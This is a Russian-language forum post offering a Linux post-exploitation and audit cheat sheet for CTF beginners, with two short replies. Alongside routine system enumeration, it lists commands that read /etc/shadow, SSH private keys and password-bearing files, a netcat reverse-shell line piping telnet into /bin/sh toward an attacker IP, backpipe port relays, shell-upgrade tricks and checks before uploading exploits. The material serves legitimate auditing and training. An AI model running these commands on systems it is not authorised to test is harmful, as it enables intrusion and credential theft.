Загрузка...

[Cheat Sheet] Server Intelligence and Audit

Thread in Security created by billmine Jun 19, 2018. 244 views

  1. billmine
    billmine Topic starter Jun 19, 2018 dE TroiD 85 Jul 8, 2016
    Всем привет! Решил поделиться с Вами списком полезных, как я считаю, команд для Linux систем со стороны аналитика.
    Возможно, пригодятся тем, кто начинает осваивать CTF.
    А так же, не будут лишними, что бы иметь их под рукой, проводя аудит реальной системы.

    Теперь по порядку:

    Операционная система.

    Определение версии и типа дистрибутива:
    Code

    cat /etc/issue
    cat /etc/*-release
    lsb_release -a
    cat /etc/lsb-release # Debian based
    cat /etc/redhat-release # Redhat based
    [IMG]


    Определение версии ядра и разрядности системы:
    Code

    cat /proc/version
    uname -a
    uname -mrs
    rpm -q kernel
    dmesg | grep Linux
    ls /boot | grep vmlinuz-
    [IMG]

    Информация о переменных окружения:
    Code

    cat /etc/profile
    cat /etc/bashrc
    cat ~/.bash_profile
    cat ~/.bashrc
    cat ~/.bash_logout
    env
    set

    [IMG]


    Приложения и сервисы.

    Список запущенных сервисов. Сервисы, запущенные от привилегированных пользователей:
    Code
    ps aux
    ps -ef
    top #htop
    cat /etc/services
    [IMG]


    Сервисы, запущенные от root:
    Code

    ps aux | grep root
    ps -ef | grep root
    [IMG]


    Поиск установленных приложений, их версий и их активности на данный момент:


    Code
    ls -alh /usr/bin/
    ls -alh /sbin/
    dpkg -l
    rpm -qa
    ls -alh /var/cache/apt/archivesO
    ls -alh /var/cache/yum/
    [IMG]


    Просмотр конфигурационных файлов:


    Code
    cat /etc/syslog.conf
    cat /etc/chttp.conf
    cat /etc/lighttpd.conf
    cat /etc/cups/cupsd.conf
    cat /etc/inetd.conf
    cat /etc/apache2/apache2.conf
    cat /etc/my.conf
    cat /etc/httpd/conf/httpd.conf
    cat /opt/lampp/etc/httpd.conf
    ls -aRl /etc/ | awk '$1 ~ /^.*r.*/



    Поиск и просмотр запланированных задач (cron):


    Code
    crontab -l
    ls -alh /var/spool/cron
    ls -al /etc/ | grep cron
    ls -al /etc/cron*
    cat /etc/cron*
    cat /etc/at.allow
    cat /etc/at.deny
    cat /etc/cron.allow
    cat /etc/cron.deny
    cat /etc/crontab
    cat /etc/anacrontab
    cat /var/spool/cron/crontabs/root



    Поиск логинов и паролей в файлах и по именам пользователей:


    Code
    grep -i user [filename]
    grep -i pass [filename]
    grep -C 5 "password" [filename]
    find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
    find / -user [user]



    Сети и коммуникации.

    Обозначение сетевых интерфейсов в системе, проверка подключений к сетям:


    Code
    /sbin/ifconfig -a
    cat /etc/network/interfaces
    cat /etc/sysconfig/network



    Определение конфигураций сетевых адаптеров, а так же DHCP, DNS, и шлюзов:


    Code
    cat /etc/resolv.conf
    cat /etc/sysconfig/network
    cat /etc/networks
    iptables -L
    hostname
    dnsdomainname



    Проверка водящих подключений к системе. Пользователи и хосты:

    Code

    lsof -i
    lsof -i :80
    grep 80 /etc/services
    netstat -antup
    netstat -antpx
    netstat -tulpn
    chkconfig --list
    chkconfig --list | grep 3:on
    last
    w



    Проверка кэша, и сохраненных IP/MAC адресов:


    Code
    arp -e
    route
    /sbin/route –nee



    Проверка возможности сниффинга трафика:


    Code
    tcpdump net 192.168.0.1/32
    [IMG]


    Проверка возможности открытия обратных подключений (TCP):


    Code
    nc -lvp 4444    # На стороне атакуемой системы
    [IMG]



    Code
    nc 192.168.0.101 4444 # Атакующая сторона
    [IMG]



    Code
    telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445    # Выполняется на атакующей системе
    Определение возможности проброса портов. Перенаправление и взаимодействие с трафиком с другого вида.


    Code
    vi /etc/rinetd.conf
    netstat –tap
    ssh -L 8080:127.0.0.1:80 root@192.168.0.101 # Локальный порт
    ssh -R 8080:127.0.0.1:80 root@192.168.0.101 # Удаленный порт
    [IMG]


    Code
    mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.5.5.151 80 >backpipe    # Ретрансляция портов
    mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # ****** (Port 80 to 8080)
    mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Мониторинг ****** (Port 80 to 8080)
    Определение возможностей туннелирования, удаленные и локальные команды:


    Code
    ssh -D 127.0.0.1:9050 -N [username]@[ip]
    proxychains ifconfig
    [IMG]


    Конфиденциальная информация и пользователи.

    Идентификация себя в системе, авторизированные пользователи, список последних авторизированных пользователей, пользователи, находящиеся в системе, последние их действия.

    Code

    id
    who
    w
    last
    cat /etc/passwd | cut -d: -f1 # List of users
    grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
    awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
    cat /etc/sudoers
    sudo –l
    [IMG]


    Просмотр конфиденциальных файлов:


    Code
    cat /etc/passwd
    cat /etc/group
    cat /etc/shadow
    ls -alh /var/mail/
    [IMG]


    Поиск «интересной» информации в домашних директориях, если есть доступ:


    Code
    ls -ahlR /root/
    ls -ahlR /home/
    [IMG]


    Поиск паролей в скриптах, базах данных и конфигурационных/журналируемых файлах.
    Пути указаны по умолчанию.


    Code
    cat /var/apache2/config.inc
    cat /var/lib/mysql/mysql/user.MYD
    cat /root/anaconda-ks.cfg
    [IMG]


    Анализ последних действий пользователя, поиск текстовых паролей, обнаружение следов редактирования:


    Code
    cat ~/.bash_history
    cat ~/.nano_history
    cat ~/.atftp_history
    cat ~/.mysql_history
    cat ~/.php_history
    [IMG]


    Общий поиск пользовательской информации:


    Code
    cat ~/.bashrc
    cat ~/.profile
    cat /var/mail/root
    cat /var/spool/mail/root
    [IMG]


    Поиск информации о приватных ключах:


    Code
    cat ~/.ssh/authorized_keys
    cat ~/.ssh/identity.pub
    cat ~/.ssh/identity
    cat ~/.ssh/id_rsa.pub
    cat ~/.ssh/id_rsa
    cat ~/.ssh/id_dsa.pub
    cat ~/.ssh/id_dsa
    cat /etc/ssh/ssh_config
    cat /etc/ssh/sshd_config
    cat /etc/ssh/ssh_host_dsa_key.pub
    cat /etc/ssh/ssh_host_dsa_key
    cat /etc/ssh/ssh_host_rsa_key.pub
    cat /etc/ssh/ssh_host_rsa_key
    cat /etc/ssh/ssh_host_key.pub
    cat /etc/ssh/ssh_host_key
    [IMG]


    Файловые системы.

    Поиск перезаписываемых конфигурационных файлов в /etc. Возможность перенастройки служб.


    Code
    ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null                  # Все
    ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Владелец
    ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Группа
    ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Другие
    find /etc/ -readable -type f 2>/dev/null # Все
    find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Все
    [IMG]


    Поиск информации в /var.


    Code
    ls -alh /var/log
    ls -alh /var/mail
    ls -alh /var/spool
    ls -alh /var/spool/lpd
    ls -alh /var/lib/pgsql
    ls -alh /var/lib/mysql
    cat /var/lib/dhcp3/dhclient.leases
    [IMG]


    Поиск скрытых настроек/файлов/файлов с информацией о базах, данных на web сервере.


    Code
    ls -alhR /var/www/
    ls -alhR /srv/www/htdocs/
    ls -alhR /usr/local/www/apache22/data/
    ls -alhR /opt/lampp/htdocs/
    ls -alhR /var/www/html/
    [IMG]


    Поиск информации в лог – файлах:


    Code
    cat /etc/httpd/****/access_log
    cat /etc/httpd/****/access.log
    cat /etc/httpd/****/error_log
    cat /etc/httpd/****/error.log
    cat /var/log/apache2/access_log
    cat /var/log/apache2/access.log
    cat /var/log/apache2/error_log
    cat /var/log/apache2/error.log
    cat /var/log/apache/access_log
    cat /var/log/apache/access.log
    cat /var/log/auth.log
    cat /var/log/chttp.log
    cat /var/log/cups/error_log
    cat /var/log/dpkg.log
    cat /var/log/faillog
    cat /var/log/httpd/access_log
    cat /var/log/httpd/access.log
    cat /var/log/httpd/error_log
    cat /var/log/httpd/error.log
    cat /var/log/lastlog
    cat /var/log/lighttpd/access.log
    cat /var/log/lighttpd/error.log
    cat /var/log/lighttpd/lighttpd.access.log
    cat /var/log/lighttpd/lighttpd.error.log
    cat /var/log/messages
    cat /var/log/secure
    cat /var/log/syslog
    cat /var/log/wtmp
    cat /var/log/xferlog
    cat /var/log/yum.log
    cat /var/run/utmp
    cat /var/webmin/miniserv.log
    cat /var/www/****/access_log
    cat /var/www/****/access.log
    ls -alh /var/lib/dhcp3/
    ls -alh /var/log/postgresql/
    ls -alh /var/log/proftpd/
    ls -alh /var/log/samba/
    [IMG]


    Способы импортирования рабочих оболочек:


    Code
    python -c 'import pty;pty.spawn("/bin/bash")'
    echo os.system('/bin/bash')
    bin/sh –i
    /bin/bash –i
    awk ‘BEGIN{system(“/bin/bash”)}’
    Монтирование файловых систем:


    Code
    mount
    df –h
    [IMG]


    Поиск размонтированных файловых систем:


    Code
    cat /etc/fstab
    [IMG]


    Поиск "Advanced Linux File Permissions" Sticky bits, SUID & GUID:


    Code
    find / -perm -1000 -type d 2>/dev/null   # Sticky bit – Только для владельца каталога
    find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - запускается как группа, а не пользователь, который ее запустил.
    find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - запускается как владелец, а не пользователь, который его запустил.
    find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID
    for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Поиск в местах по умолчанию - /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin и других *bin, для SGID or SUID (Быстрый поиск)
    Поиск в корневом каталоге (/), SGID or SUID, без символьных ссылок, только для первых трех каталогов, вывод подробной информации и игнорирование ошибок (например - permission denied)


    Code
    find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null
    [IMG]


    Поиск директорий, в которых можно записывать и запускать файлы. В общих директориях: /tmp, /var/tmp, /dev/shm:

    Code

    find / -writable -type d 2>/dev/null # общедоступные папки
    find / -perm -222 -type d 2>/dev/null # общедоступные папки
    find / -perm -o w -type d 2>/dev/null # общедоступные папки
    find / -perm -o x -type d 2>/dev/null # общедоступные папки
    find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # общедоступные папки & исполняемые папки
    [IMG]


    Поиск различных нетипичных файлов, «nobody» etc.


    Code
    find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # общедоступные файлы
    find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files
    [IMG]


    Подготовка к загрузке и исполнению Exploit.

    Языки программирования и компиляторы:

    Code

    find / -name perl*
    find / -name python*
    find / -name gcc*
    find / -name cc
    python –version
    ruby –version
    gcc --version
    Поиск возможности загрузки файлов на сервер:


    Code
    find / -name wget
    find / -name nc*
    find / -name netcat*
    find / -name tftp*
    find / -name ftp
    wget –version
    nc -v
    На этом пока все, если интересно - могу продолжить.

    Спасибо за внимание.
     
  2. billmine
    billmine Topic starter Jun 19, 2018 dE TroiD 85 Jul 8, 2016
    форм запрещает мне выкладывать более 30 скринов. так что без них
     
  3. RedLion
    RedLion Jun 19, 2018 В сети 1754 Mar 23, 2014
    спасибо, полезно
     
Top
Loading...